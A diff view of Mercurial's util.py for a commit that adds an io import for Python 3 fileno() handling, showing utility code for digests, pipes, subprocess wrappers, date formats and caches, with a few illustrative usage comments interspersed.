util: handle fileno() on Python 3 throwing io.UnsupportedOperation...
Augie Fackler
r36450:1ca4e86c (default branch)
@@ -1,4009 +1,4013 @@
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import calendar
21 21 import codecs
22 22 import collections
23 23 import contextlib
24 24 import datetime
25 25 import errno
26 26 import gc
27 27 import hashlib
28 28 import imp
29 import io
29 30 import itertools
30 31 import mmap
31 32 import os
32 33 import platform as pyplatform
33 34 import re as remod
34 35 import shutil
35 36 import signal
36 37 import socket
37 38 import stat
38 39 import string
39 40 import subprocess
40 41 import sys
41 42 import tempfile
42 43 import textwrap
43 44 import time
44 45 import traceback
45 46 import warnings
46 47 import zlib
47 48
48 49 from . import (
49 50 encoding,
50 51 error,
51 52 i18n,
52 53 node as nodemod,
53 54 policy,
54 55 pycompat,
55 56 urllibcompat,
56 57 )
57 58
58 59 base85 = policy.importmod(r'base85')
59 60 osutil = policy.importmod(r'osutil')
60 61 parsers = policy.importmod(r'parsers')
61 62
62 63 b85decode = base85.b85decode
63 64 b85encode = base85.b85encode
64 65
65 66 cookielib = pycompat.cookielib
66 67 empty = pycompat.empty
67 68 httplib = pycompat.httplib
68 69 pickle = pycompat.pickle
69 70 queue = pycompat.queue
70 71 socketserver = pycompat.socketserver
71 72 stderr = pycompat.stderr
72 73 stdin = pycompat.stdin
73 74 stdout = pycompat.stdout
74 75 stringio = pycompat.stringio
75 76 xmlrpclib = pycompat.xmlrpclib
76 77
77 78 httpserver = urllibcompat.httpserver
78 79 urlerr = urllibcompat.urlerr
79 80 urlreq = urllibcompat.urlreq
80 81
81 82 # workaround for win32mbcs
82 83 _filenamebytestr = pycompat.bytestr
83 84
84 85 def isatty(fp):
85 86 try:
86 87 return fp.isatty()
87 88 except AttributeError:
88 89 return False
89 90
90 91 # glibc determines buffering on first write to stdout - if we replace a TTY
91 92 # destined stdout with a pipe destined stdout (e.g. pager), we want line
92 93 # buffering
93 94 if isatty(stdout):
94 95 stdout = os.fdopen(stdout.fileno(), pycompat.sysstr('wb'), 1)
95 96
96 97 if pycompat.iswindows:
97 98 from . import windows as platform
98 99 stdout = platform.winstdout(stdout)
99 100 else:
100 101 from . import posix as platform
101 102
102 103 _ = i18n._
103 104
104 105 bindunixsocket = platform.bindunixsocket
105 106 cachestat = platform.cachestat
106 107 checkexec = platform.checkexec
107 108 checklink = platform.checklink
108 109 copymode = platform.copymode
109 110 executablepath = platform.executablepath
110 111 expandglobs = platform.expandglobs
111 112 explainexit = platform.explainexit
112 113 findexe = platform.findexe
113 114 getfsmountpoint = platform.getfsmountpoint
114 115 getfstype = platform.getfstype
115 116 gethgcmd = platform.gethgcmd
116 117 getuser = platform.getuser
117 118 getpid = os.getpid
118 119 groupmembers = platform.groupmembers
119 120 groupname = platform.groupname
120 121 hidewindow = platform.hidewindow
121 122 isexec = platform.isexec
122 123 isowner = platform.isowner
123 124 listdir = osutil.listdir
124 125 localpath = platform.localpath
125 126 lookupreg = platform.lookupreg
126 127 makedir = platform.makedir
127 128 nlinks = platform.nlinks
128 129 normpath = platform.normpath
129 130 normcase = platform.normcase
130 131 normcasespec = platform.normcasespec
131 132 normcasefallback = platform.normcasefallback
132 133 openhardlinks = platform.openhardlinks
133 134 oslink = platform.oslink
134 135 parsepatchoutput = platform.parsepatchoutput
135 136 pconvert = platform.pconvert
136 137 poll = platform.poll
137 138 popen = platform.popen
138 139 posixfile = platform.posixfile
139 140 quotecommand = platform.quotecommand
140 141 readpipe = platform.readpipe
141 142 rename = platform.rename
142 143 removedirs = platform.removedirs
143 144 samedevice = platform.samedevice
144 145 samefile = platform.samefile
145 146 samestat = platform.samestat
146 147 setbinary = platform.setbinary
147 148 setflags = platform.setflags
148 149 setsignalhandler = platform.setsignalhandler
149 150 shellquote = platform.shellquote
150 151 shellsplit = platform.shellsplit
151 152 spawndetached = platform.spawndetached
152 153 split = platform.split
153 154 sshargs = platform.sshargs
154 155 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
155 156 statisexec = platform.statisexec
156 157 statislink = platform.statislink
157 158 testpid = platform.testpid
158 159 umask = platform.umask
159 160 unlink = platform.unlink
160 161 username = platform.username
161 162
162 163 try:
163 164 recvfds = osutil.recvfds
164 165 except AttributeError:
165 166 pass
166 167 try:
167 168 setprocname = osutil.setprocname
168 169 except AttributeError:
169 170 pass
170 171 try:
171 172 unblocksignal = osutil.unblocksignal
172 173 except AttributeError:
173 174 pass
174 175
175 176 # Python compatibility
176 177
177 178 _notset = object()
178 179
179 180 # disable Python's problematic floating point timestamps (issue4836)
180 181 # (Python hypocritically says you shouldn't change this behavior in
181 182 # libraries, and sure enough Mercurial is not a library.)
182 183 os.stat_float_times(False)
183 184
184 185 def safehasattr(thing, attr):
185 186 return getattr(thing, attr, _notset) is not _notset
186 187
187 188 def _rapply(f, xs):
188 189 if xs is None:
189 190 # assume None means non-value of optional data
190 191 return xs
191 192 if isinstance(xs, (list, set, tuple)):
192 193 return type(xs)(_rapply(f, x) for x in xs)
193 194 if isinstance(xs, dict):
194 195 return type(xs)((_rapply(f, k), _rapply(f, v)) for k, v in xs.items())
195 196 return f(xs)
196 197
197 198 def rapply(f, xs):
198 199 """Apply function recursively to every item preserving the data structure
199 200
200 201 >>> def f(x):
201 202 ... return 'f(%s)' % x
202 203 >>> rapply(f, None) is None
203 204 True
204 205 >>> rapply(f, 'a')
205 206 'f(a)'
206 207 >>> rapply(f, {'a'}) == {'f(a)'}
207 208 True
208 209 >>> rapply(f, ['a', 'b', None, {'c': 'd'}, []])
209 210 ['f(a)', 'f(b)', None, {'f(c)': 'f(d)'}, []]
210 211
211 212 >>> xs = [object()]
212 213 >>> rapply(pycompat.identity, xs) is xs
213 214 True
214 215 """
215 216 if f is pycompat.identity:
216 217 # fast path mainly for py2
217 218 return xs
218 219 return _rapply(f, xs)
219 220
220 221 def bytesinput(fin, fout, *args, **kwargs):
221 222 sin, sout = sys.stdin, sys.stdout
222 223 try:
223 224 sys.stdin, sys.stdout = encoding.strio(fin), encoding.strio(fout)
224 225 return encoding.strtolocal(pycompat.rawinput(*args, **kwargs))
225 226 finally:
226 227 sys.stdin, sys.stdout = sin, sout
227 228
228 229 def bitsfrom(container):
229 230 bits = 0
230 231 for bit in container:
231 232 bits |= bit
232 233 return bits
233 234
234 235 # python 2.6 still has deprecation warnings enabled by default. We do not want
235 236 # to display anything to a standard user, so detect if we are running tests and
236 237 # only use python deprecation warnings in this case.
237 238 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
238 239 if _dowarn:
239 240 # explicitly unfilter our warning for python 2.7
240 241 #
241 242 # The option of setting PYTHONWARNINGS in the test runner was investigated.
242 243 # However, module name set through PYTHONWARNINGS was exactly matched, so
243 244 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
244 245 # makes the whole PYTHONWARNINGS thing useless for our usecase.
245 246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
246 247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
247 248 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
248 249
249 250 def nouideprecwarn(msg, version, stacklevel=1):
250 251 """Issue an python native deprecation warning
251 252
252 253 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
253 254 """
254 255 if _dowarn:
255 256 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
256 257 " update your code.)") % version
257 258 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
258 259
259 260 DIGESTS = {
260 261 'md5': hashlib.md5,
261 262 'sha1': hashlib.sha1,
262 263 'sha512': hashlib.sha512,
263 264 }
264 265 # List of digest types from strongest to weakest
265 266 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
266 267
267 268 for k in DIGESTS_BY_STRENGTH:
268 269 assert k in DIGESTS
269 270
270 271 class digester(object):
271 272 """helper to compute digests.
272 273
273 274 This helper can be used to compute one or more digests given their name.
274 275
275 276 >>> d = digester([b'md5', b'sha1'])
276 277 >>> d.update(b'foo')
277 278 >>> [k for k in sorted(d)]
278 279 ['md5', 'sha1']
279 280 >>> d[b'md5']
280 281 'acbd18db4cc2f85cedef654fccc4a4d8'
281 282 >>> d[b'sha1']
282 283 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
283 284 >>> digester.preferred([b'md5', b'sha1'])
284 285 'sha1'
285 286 """
286 287
287 288 def __init__(self, digests, s=''):
288 289 self._hashes = {}
289 290 for k in digests:
290 291 if k not in DIGESTS:
291 292 raise Abort(_('unknown digest type: %s') % k)
292 293 self._hashes[k] = DIGESTS[k]()
293 294 if s:
294 295 self.update(s)
295 296
296 297 def update(self, data):
297 298 for h in self._hashes.values():
298 299 h.update(data)
299 300
300 301 def __getitem__(self, key):
301 302 if key not in DIGESTS:
302 303 raise Abort(_('unknown digest type: %s') % key)
303 304 return nodemod.hex(self._hashes[key].digest())
304 305
305 306 def __iter__(self):
306 307 return iter(self._hashes)
307 308
308 309 @staticmethod
309 310 def preferred(supported):
310 311 """returns the strongest digest type in both supported and DIGESTS."""
311 312
312 313 for k in DIGESTS_BY_STRENGTH:
313 314 if k in supported:
314 315 return k
315 316 return None
316 317
317 318 class digestchecker(object):
318 319 """file handle wrapper that additionally checks content against a given
319 320 size and digests.
320 321
321 322 d = digestchecker(fh, size, {'md5': '...'})
322 323
323 324 When multiple digests are given, all of them are validated.
324 325 """
325 326
326 327 def __init__(self, fh, size, digests):
327 328 self._fh = fh
328 329 self._size = size
329 330 self._got = 0
330 331 self._digests = dict(digests)
331 332 self._digester = digester(self._digests.keys())
332 333
333 334 def read(self, length=-1):
334 335 content = self._fh.read(length)
335 336 self._digester.update(content)
336 337 self._got += len(content)
337 338 return content
338 339
339 340 def validate(self):
340 341 if self._size != self._got:
341 342 raise Abort(_('size mismatch: expected %d, got %d') %
342 343 (self._size, self._got))
343 344 for k, v in self._digests.items():
344 345 if v != self._digester[k]:
345 346 # i18n: first parameter is a digest name
346 347 raise Abort(_('%s mismatch: expected %s, got %s') %
347 348 (k, v, self._digester[k]))
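
# A minimal usage sketch of digestchecker (illustrative, not part of
# util.py; the names fh, expectedsize and expectedhexdigest are hypothetical):
# read the wrapped stream to exhaustion, then validate() raises Abort on any
# size or digest mismatch.
#
#     checker = digestchecker(fh, expectedsize, {'sha1': expectedhexdigest})
#     while checker.read(4096):
#         pass
#     checker.validate()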
348 349
349 350 try:
350 351 buffer = buffer
351 352 except NameError:
352 353 def buffer(sliceable, offset=0, length=None):
353 354 if length is not None:
354 355 return memoryview(sliceable)[offset:offset + length]
355 356 return memoryview(sliceable)[offset:]
356 357
357 358 closefds = pycompat.isposix
358 359
359 360 _chunksize = 4096
360 361
361 362 class bufferedinputpipe(object):
362 363 """a manually buffered input pipe
363 364
364 365 Python will not let us use buffered IO and lazy reading with 'polling' at
365 366 the same time. We cannot probe the buffer state and select will not detect
366 367 that data are ready to read if they are already buffered.
367 368
368 369 This class lets us work around that by implementing its own buffering
369 370 (allowing efficient readline) while offering a way to know if the buffer is
370 371 empty from the output (allowing collaboration of the buffer with polling).
371 372
372 373 This class lives in the 'util' module because it makes use of the 'os'
373 374 module from the python stdlib.
374 375 """
375 376
376 377 def __init__(self, input):
377 378 self._input = input
378 379 self._buffer = []
379 380 self._eof = False
380 381 self._lenbuf = 0
381 382
382 383 @property
383 384 def hasbuffer(self):
384 385 """True is any data is currently buffered
385 386
386 387 This will be used externally as a pre-step for polling IO. If there is
387 388 already data then no polling should be set in place."""
388 389 return bool(self._buffer)
389 390
390 391 @property
391 392 def closed(self):
392 393 return self._input.closed
393 394
394 395 def fileno(self):
395 396 return self._input.fileno()
396 397
397 398 def close(self):
398 399 return self._input.close()
399 400
400 401 def read(self, size):
401 402 while (not self._eof) and (self._lenbuf < size):
402 403 self._fillbuffer()
403 404 return self._frombuffer(size)
404 405
405 406 def readline(self, *args, **kwargs):
406 407 if 1 < len(self._buffer):
407 408 # this should not happen because both read and readline end with a
408 409 # _frombuffer call that collapses it.
409 410 self._buffer = [''.join(self._buffer)]
410 411 self._lenbuf = len(self._buffer[0])
411 412 lfi = -1
412 413 if self._buffer:
413 414 lfi = self._buffer[-1].find('\n')
414 415 while (not self._eof) and lfi < 0:
415 416 self._fillbuffer()
416 417 if self._buffer:
417 418 lfi = self._buffer[-1].find('\n')
418 419 size = lfi + 1
419 420 if lfi < 0: # end of file
420 421 size = self._lenbuf
421 422 elif 1 < len(self._buffer):
422 423 # we need to take previous chunks into account
423 424 size += self._lenbuf - len(self._buffer[-1])
424 425 return self._frombuffer(size)
425 426
426 427 def _frombuffer(self, size):
427 428 """return at most 'size' data from the buffer
428 429
429 430 The data are removed from the buffer."""
430 431 if size == 0 or not self._buffer:
431 432 return ''
432 433 buf = self._buffer[0]
433 434 if 1 < len(self._buffer):
434 435 buf = ''.join(self._buffer)
435 436
436 437 data = buf[:size]
437 438 buf = buf[len(data):]
438 439 if buf:
439 440 self._buffer = [buf]
440 441 self._lenbuf = len(buf)
441 442 else:
442 443 self._buffer = []
443 444 self._lenbuf = 0
444 445 return data
445 446
446 447 def _fillbuffer(self):
447 448 """read data to the buffer"""
448 449 data = os.read(self._input.fileno(), _chunksize)
449 450 if not data:
450 451 self._eof = True
451 452 else:
452 453 self._lenbuf += len(data)
453 454 self._buffer.append(data)
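
# An illustrative sketch (not part of util.py) of the buffer/polling
# collaboration described in the class docstring: consult hasbuffer before
# blocking in select(), because already-buffered data will never wake
# select() up.
#
#     import select
#     def nextline(pipe):
#         if not pipe.hasbuffer:
#             select.select([pipe.fileno()], [], [])
#         return pipe.readline()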
454 455
455 456 def mmapread(fp):
456 457 try:
457 458 fd = getattr(fp, 'fileno', lambda: fp)()
458 459 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
459 460 except ValueError:
460 461 # Empty files cannot be mmapped, but mmapread should still work. Check
461 462 # if the file is empty, and if so, return an empty buffer.
462 463 if os.fstat(fd).st_size == 0:
463 464 return ''
464 465 raise
465 466
466 467 def popen2(cmd, env=None, newlines=False):
467 468 # Setting bufsize to -1 lets the system decide the buffer size.
468 469 # The default for bufsize is 0, meaning unbuffered. This leads to
469 470 # poor performance on Mac OS X: http://bugs.python.org/issue4194
470 471 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
471 472 close_fds=closefds,
472 473 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
473 474 universal_newlines=newlines,
474 475 env=env)
475 476 return p.stdin, p.stdout
476 477
477 478 def popen3(cmd, env=None, newlines=False):
478 479 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
479 480 return stdin, stdout, stderr
480 481
481 482 def popen4(cmd, env=None, newlines=False, bufsize=-1):
482 483 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
483 484 close_fds=closefds,
484 485 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
485 486 stderr=subprocess.PIPE,
486 487 universal_newlines=newlines,
487 488 env=env)
488 489 return p.stdin, p.stdout, p.stderr, p
489 490
490 491 def version():
491 492 """Return version information if available."""
492 493 try:
493 494 from . import __version__
494 495 return __version__.version
495 496 except ImportError:
496 497 return 'unknown'
497 498
498 499 def versiontuple(v=None, n=4):
499 500 """Parses a Mercurial version string into an N-tuple.
500 501
501 502 The version string to be parsed is specified with the ``v`` argument.
502 503 If it isn't defined, the current Mercurial version string will be parsed.
503 504
504 505 ``n`` can be 2, 3, or 4. Here is how some version strings map to
505 506 returned values:
506 507
507 508 >>> v = b'3.6.1+190-df9b73d2d444'
508 509 >>> versiontuple(v, 2)
509 510 (3, 6)
510 511 >>> versiontuple(v, 3)
511 512 (3, 6, 1)
512 513 >>> versiontuple(v, 4)
513 514 (3, 6, 1, '190-df9b73d2d444')
514 515
515 516 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
516 517 (3, 6, 1, '190-df9b73d2d444+20151118')
517 518
518 519 >>> v = b'3.6'
519 520 >>> versiontuple(v, 2)
520 521 (3, 6)
521 522 >>> versiontuple(v, 3)
522 523 (3, 6, None)
523 524 >>> versiontuple(v, 4)
524 525 (3, 6, None, None)
525 526
526 527 >>> v = b'3.9-rc'
527 528 >>> versiontuple(v, 2)
528 529 (3, 9)
529 530 >>> versiontuple(v, 3)
530 531 (3, 9, None)
531 532 >>> versiontuple(v, 4)
532 533 (3, 9, None, 'rc')
533 534
534 535 >>> v = b'3.9-rc+2-02a8fea4289b'
535 536 >>> versiontuple(v, 2)
536 537 (3, 9)
537 538 >>> versiontuple(v, 3)
538 539 (3, 9, None)
539 540 >>> versiontuple(v, 4)
540 541 (3, 9, None, 'rc+2-02a8fea4289b')
541 542 """
542 543 if not v:
543 544 v = version()
544 545 parts = remod.split('[\+-]', v, 1)
545 546 if len(parts) == 1:
546 547 vparts, extra = parts[0], None
547 548 else:
548 549 vparts, extra = parts
549 550
550 551 vints = []
551 552 for i in vparts.split('.'):
552 553 try:
553 554 vints.append(int(i))
554 555 except ValueError:
555 556 break
556 557 # (3, 6) -> (3, 6, None)
557 558 while len(vints) < 3:
558 559 vints.append(None)
559 560
560 561 if n == 2:
561 562 return (vints[0], vints[1])
562 563 if n == 3:
563 564 return (vints[0], vints[1], vints[2])
564 565 if n == 4:
565 566 return (vints[0], vints[1], vints[2], extra)
566 567
567 568 # used by parsedate
568 569 defaultdateformats = (
569 570 '%Y-%m-%dT%H:%M:%S', # the 'real' ISO8601
570 571 '%Y-%m-%dT%H:%M', # without seconds
571 572 '%Y-%m-%dT%H%M%S', # another awful but legal variant without :
572 573 '%Y-%m-%dT%H%M', # without seconds
573 574 '%Y-%m-%d %H:%M:%S', # our common legal variant
574 575 '%Y-%m-%d %H:%M', # without seconds
575 576 '%Y-%m-%d %H%M%S', # without :
576 577 '%Y-%m-%d %H%M', # without seconds
577 578 '%Y-%m-%d %I:%M:%S%p',
578 579 '%Y-%m-%d %H:%M',
579 580 '%Y-%m-%d %I:%M%p',
580 581 '%Y-%m-%d',
581 582 '%m-%d',
582 583 '%m/%d',
583 584 '%m/%d/%y',
584 585 '%m/%d/%Y',
585 586 '%a %b %d %H:%M:%S %Y',
586 587 '%a %b %d %I:%M:%S%p %Y',
587 588 '%a, %d %b %Y %H:%M:%S', # GNU coreutils "/bin/date --rfc-2822"
588 589 '%b %d %H:%M:%S %Y',
589 590 '%b %d %I:%M:%S%p %Y',
590 591 '%b %d %H:%M:%S',
591 592 '%b %d %I:%M:%S%p',
592 593 '%b %d %H:%M',
593 594 '%b %d %I:%M%p',
594 595 '%b %d %Y',
595 596 '%b %d',
596 597 '%H:%M:%S',
597 598 '%I:%M:%S%p',
598 599 '%H:%M',
599 600 '%I:%M%p',
600 601 )
601 602
602 603 extendeddateformats = defaultdateformats + (
603 604 "%Y",
604 605 "%Y-%m",
605 606 "%b",
606 607 "%b %Y",
607 608 )
608 609
609 610 def cachefunc(func):
610 611 '''cache the result of function calls'''
611 612 # XXX doesn't handle keywords args
612 613 if func.__code__.co_argcount == 0:
613 614 cache = []
614 615 def f():
615 616 if len(cache) == 0:
616 617 cache.append(func())
617 618 return cache[0]
618 619 return f
619 620 cache = {}
620 621 if func.__code__.co_argcount == 1:
621 622 # we gain a small amount of time because
622 623 # we don't need to pack/unpack the list
623 624 def f(arg):
624 625 if arg not in cache:
625 626 cache[arg] = func(arg)
626 627 return cache[arg]
627 628 else:
628 629 def f(*args):
629 630 if args not in cache:
630 631 cache[args] = func(*args)
631 632 return cache[args]
632 633
633 634 return f
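
# A minimal usage sketch of cachefunc (illustrative, not part of util.py):
#
#     >>> @cachefunc
#     ... def double(x):
#     ...     print('computing %d' % x)
#     ...     return x * 2
#     >>> double(2)
#     computing 2
#     4
#     >>> double(2)  # served from the cache, no recomputation
#     4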
634 635
635 636 class cow(object):
636 637 """helper class to make copy-on-write easier
637 638
638 639 Call preparewrite before doing any writes.
639 640 """
640 641
641 642 def preparewrite(self):
642 643 """call this before writes, return self or a copied new object"""
643 644 if getattr(self, '_copied', 0):
644 645 self._copied -= 1
645 646 return self.__class__(self)
646 647 return self
647 648
648 649 def copy(self):
649 650 """always do a cheap copy"""
650 651 self._copied = getattr(self, '_copied', 0) + 1
651 652 return self
652 653
653 654 class sortdict(collections.OrderedDict):
654 655 '''a simple sorted dictionary
655 656
656 657 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
657 658 >>> d2 = d1.copy()
658 659 >>> d2
659 660 sortdict([('a', 0), ('b', 1)])
660 661 >>> d2.update([(b'a', 2)])
661 662 >>> list(d2.keys()) # should still be in last-set order
662 663 ['b', 'a']
663 664 '''
664 665
665 666 def __setitem__(self, key, value):
666 667 if key in self:
667 668 del self[key]
668 669 super(sortdict, self).__setitem__(key, value)
669 670
670 671 if pycompat.ispypy:
671 672 # __setitem__() isn't called as of PyPy 5.8.0
672 673 def update(self, src):
673 674 if isinstance(src, dict):
674 675 src = src.iteritems()
675 676 for k, v in src:
676 677 self[k] = v
677 678
678 679 class cowdict(cow, dict):
679 680 """copy-on-write dict
680 681
681 682 Be sure to call d = d.preparewrite() before writing to d.
682 683
683 684 >>> a = cowdict()
684 685 >>> a is a.preparewrite()
685 686 True
686 687 >>> b = a.copy()
687 688 >>> b is a
688 689 True
689 690 >>> c = b.copy()
690 691 >>> c is a
691 692 True
692 693 >>> a = a.preparewrite()
693 694 >>> b is a
694 695 False
695 696 >>> a is a.preparewrite()
696 697 True
697 698 >>> c = c.preparewrite()
698 699 >>> b is c
699 700 False
700 701 >>> b is b.preparewrite()
701 702 True
702 703 """
703 704
704 705 class cowsortdict(cow, sortdict):
705 706 """copy-on-write sortdict
706 707
707 708 Be sure to call d = d.preparewrite() before writing to d.
708 709 """
709 710
710 711 class transactional(object):
711 712 """Base class for making a transactional type into a context manager."""
712 713 __metaclass__ = abc.ABCMeta
713 714
714 715 @abc.abstractmethod
715 716 def close(self):
716 717 """Successfully closes the transaction."""
717 718
718 719 @abc.abstractmethod
719 720 def release(self):
720 721 """Marks the end of the transaction.
721 722
722 723 If the transaction has not been closed, it will be aborted.
723 724 """
724 725
725 726 def __enter__(self):
726 727 return self
727 728
728 729 def __exit__(self, exc_type, exc_val, exc_tb):
729 730 try:
730 731 if exc_type is None:
731 732 self.close()
732 733 finally:
733 734 self.release()
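
# An illustrative sketch (hypothetical subclass and helper, not part of
# util.py) of the context-manager contract above: close() runs only on
# success, release() runs either way, so an exception inside the block
# aborts the transaction.
#
#     with sometransaction() as tr:   # sometransaction subclasses transactional
#         dowrites(tr)                # raising here skips close(), and
#                                     # release() then aborts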
734 735
735 736 @contextlib.contextmanager
736 737 def acceptintervention(tr=None):
737 738 """A context manager that closes the transaction on InterventionRequired
738 739
739 740 If no transaction was provided, this simply runs the body and returns
740 741 """
741 742 if not tr:
742 743 yield
743 744 return
744 745 try:
745 746 yield
746 747 tr.close()
747 748 except error.InterventionRequired:
748 749 tr.close()
749 750 raise
750 751 finally:
751 752 tr.release()
752 753
753 754 @contextlib.contextmanager
754 755 def nullcontextmanager():
755 756 yield
756 757
757 758 class _lrucachenode(object):
758 759 """A node in a doubly linked list.
759 760
760 761 Holds a reference to nodes on either side as well as a key-value
761 762 pair for the dictionary entry.
762 763 """
763 764 __slots__ = (u'next', u'prev', u'key', u'value')
764 765
765 766 def __init__(self):
766 767 self.next = None
767 768 self.prev = None
768 769
769 770 self.key = _notset
770 771 self.value = None
771 772
772 773 def markempty(self):
773 774 """Mark the node as emptied."""
774 775 self.key = _notset
775 776
776 777 class lrucachedict(object):
777 778 """Dict that caches most recent accesses and sets.
778 779
779 780 The dict consists of an actual backing dict - indexed by original
780 781 key - and a doubly linked circular list defining the order of entries in
781 782 the cache.
782 783
783 784 The head node is the newest entry in the cache. If the cache is full,
784 785 we recycle head.prev and make it the new head. Cache accesses result in
785 786 the node being moved to before the existing head and being marked as the
786 787 new head node.
787 788 """
788 789 def __init__(self, max):
789 790 self._cache = {}
790 791
791 792 self._head = head = _lrucachenode()
792 793 head.prev = head
793 794 head.next = head
794 795 self._size = 1
795 796 self._capacity = max
796 797
797 798 def __len__(self):
798 799 return len(self._cache)
799 800
800 801 def __contains__(self, k):
801 802 return k in self._cache
802 803
803 804 def __iter__(self):
804 805 # We don't have to iterate in cache order, but why not.
805 806 n = self._head
806 807 for i in range(len(self._cache)):
807 808 yield n.key
808 809 n = n.next
809 810
810 811 def __getitem__(self, k):
811 812 node = self._cache[k]
812 813 self._movetohead(node)
813 814 return node.value
814 815
815 816 def __setitem__(self, k, v):
816 817 node = self._cache.get(k)
817 818 # Replace existing value and mark as newest.
818 819 if node is not None:
819 820 node.value = v
820 821 self._movetohead(node)
821 822 return
822 823
823 824 if self._size < self._capacity:
824 825 node = self._addcapacity()
825 826 else:
826 827 # Grab the last/oldest item.
827 828 node = self._head.prev
828 829
829 830 # At capacity. Kill the old entry.
830 831 if node.key is not _notset:
831 832 del self._cache[node.key]
832 833
833 834 node.key = k
834 835 node.value = v
835 836 self._cache[k] = node
836 837 # And mark it as newest entry. No need to adjust order since it
837 838 # is already self._head.prev.
838 839 self._head = node
839 840
840 841 def __delitem__(self, k):
841 842 node = self._cache.pop(k)
842 843 node.markempty()
843 844
844 845 # Temporarily mark as newest item before re-adjusting head to make
845 846 # this node the oldest item.
846 847 self._movetohead(node)
847 848 self._head = node.next
848 849
849 850 # Additional dict methods.
850 851
851 852 def get(self, k, default=None):
852 853 try:
853 854 return self._cache[k].value
854 855 except KeyError:
855 856 return default
856 857
857 858 def clear(self):
858 859 n = self._head
859 860 while n.key is not _notset:
860 861 n.markempty()
861 862 n = n.next
862 863
863 864 self._cache.clear()
864 865
865 866 def copy(self):
866 867 result = lrucachedict(self._capacity)
867 868 n = self._head.prev
868 869 # Iterate in oldest-to-newest order, so the copy has the right ordering
869 870 for i in range(len(self._cache)):
870 871 result[n.key] = n.value
871 872 n = n.prev
872 873 return result
873 874
874 875 def _movetohead(self, node):
875 876 """Mark a node as the newest, making it the new head.
876 877
877 878 When a node is accessed, it becomes the freshest entry in the LRU
878 879 list, which is denoted by self._head.
879 880
880 881 Visually, let's make ``N`` the new head node (* denotes head):
881 882
882 883 previous/oldest <-> head <-> next/next newest
883 884
884 885 ----<->--- A* ---<->-----
885 886 | |
886 887 E <-> D <-> N <-> C <-> B
887 888
888 889 To:
889 890
890 891 ----<->--- N* ---<->-----
891 892 | |
892 893 E <-> D <-> C <-> B <-> A
893 894
894 895 This requires the following moves:
895 896
896 897 C.next = D (node.prev.next = node.next)
897 898 D.prev = C (node.next.prev = node.prev)
898 899 E.next = N (head.prev.next = node)
899 900 N.prev = E (node.prev = head.prev)
900 901 N.next = A (node.next = head)
901 902 A.prev = N (head.prev = node)
902 903 """
903 904 head = self._head
904 905 # C.next = D
905 906 node.prev.next = node.next
906 907 # D.prev = C
907 908 node.next.prev = node.prev
908 909 # N.prev = E
909 910 node.prev = head.prev
910 911 # N.next = A
911 912 # It is tempting to do just "head" here; however, if node is
912 913 # adjacent to head, this will do bad things.
913 914 node.next = head.prev.next
914 915 # E.next = N
915 916 node.next.prev = node
916 917 # A.prev = N
917 918 node.prev.next = node
918 919
919 920 self._head = node
920 921
921 922 def _addcapacity(self):
922 923 """Add a node to the circular linked list.
923 924
924 925 The new node is inserted before the head node.
925 926 """
926 927 head = self._head
927 928 node = _lrucachenode()
928 929 head.prev.next = node
929 930 node.prev = head.prev
930 931 node.next = head
931 932 head.prev = node
932 933 self._size += 1
933 934 return node
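
# A minimal usage sketch of lrucachedict (illustrative, not part of
# util.py): with capacity 2, inserting a third key recycles the oldest node.
#
#     d = lrucachedict(2)
#     d['a'] = 1
#     d['b'] = 2
#     d['c'] = 3        # 'a' is the least recently used entry and is evicted
#     assert 'a' not in d and d['c'] == 3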
934 935
935 936 def lrucachefunc(func):
936 937 '''cache most recent results of function calls'''
937 938 cache = {}
938 939 order = collections.deque()
939 940 if func.__code__.co_argcount == 1:
940 941 def f(arg):
941 942 if arg not in cache:
942 943 if len(cache) > 20:
943 944 del cache[order.popleft()]
944 945 cache[arg] = func(arg)
945 946 else:
946 947 order.remove(arg)
947 948 order.append(arg)
948 949 return cache[arg]
949 950 else:
950 951 def f(*args):
951 952 if args not in cache:
952 953 if len(cache) > 20:
953 954 del cache[order.popleft()]
954 955 cache[args] = func(*args)
955 956 else:
956 957 order.remove(args)
957 958 order.append(args)
958 959 return cache[args]
959 960
960 961 return f
961 962
962 963 class propertycache(object):
963 964 def __init__(self, func):
964 965 self.func = func
965 966 self.name = func.__name__
966 967 def __get__(self, obj, type=None):
967 968 result = self.func(obj)
968 969 self.cachevalue(obj, result)
969 970 return result
970 971
971 972 def cachevalue(self, obj, value):
972 973 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
973 974 obj.__dict__[self.name] = value
974 975
975 976 def clearcachedproperty(obj, prop):
976 977 '''clear a cached property value, if one has been set'''
977 978 if prop in obj.__dict__:
978 979 del obj.__dict__[prop]
979 980
980 981 def pipefilter(s, cmd):
981 982 '''filter string S through command CMD, returning its output'''
982 983 p = subprocess.Popen(cmd, shell=True, close_fds=closefds,
983 984 stdin=subprocess.PIPE, stdout=subprocess.PIPE)
984 985 pout, perr = p.communicate(s)
985 986 return pout
986 987
